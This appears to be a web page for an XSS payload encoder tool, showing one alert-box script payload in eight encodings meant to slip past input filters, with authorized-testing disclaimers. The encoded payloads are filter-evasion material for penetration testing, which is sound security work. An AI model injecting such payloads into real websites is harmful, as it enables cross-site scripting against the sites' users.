XSS Payload Encoder
Encode strings using various encoding methods for security testing. For authorized penetration testing and security research only.
49.7Kuses
7.5/10(300)
For authorized security testing only. Only test systems you have permission to test.
HTML Entity (Decimal)
<script>alert("XSS")</script>
HTML Entity (Named)
<script>alert("XSS")</script>
URL Encoding
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E
Double URL Encoding
%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%36%31%25%36%43%25%36%35%25%37%32%25%37%34%25%32%38%25%32%32%25%35%38%25%35%33%25%35%33%25%32%32%25%32%39%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45
Unicode
\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0058\u0053\u0053\u0022\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
Hex Encoding
\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
Base64
PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
JS String.fromCharCode
String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,88,83,83,34,41,60,47,115,99,114,105,112,116,62)
Disclaimer
This tool is for authorized security testing and educational purposes only. Only test applications you have permission to test.
⚡ Pro OptionsSponsored
Some links on this page are affiliate links. If you click and make a purchase, we may earn a commission at no extra cost to you.
Disclaimer: This tool is provided as-is for informational and educational purposes only.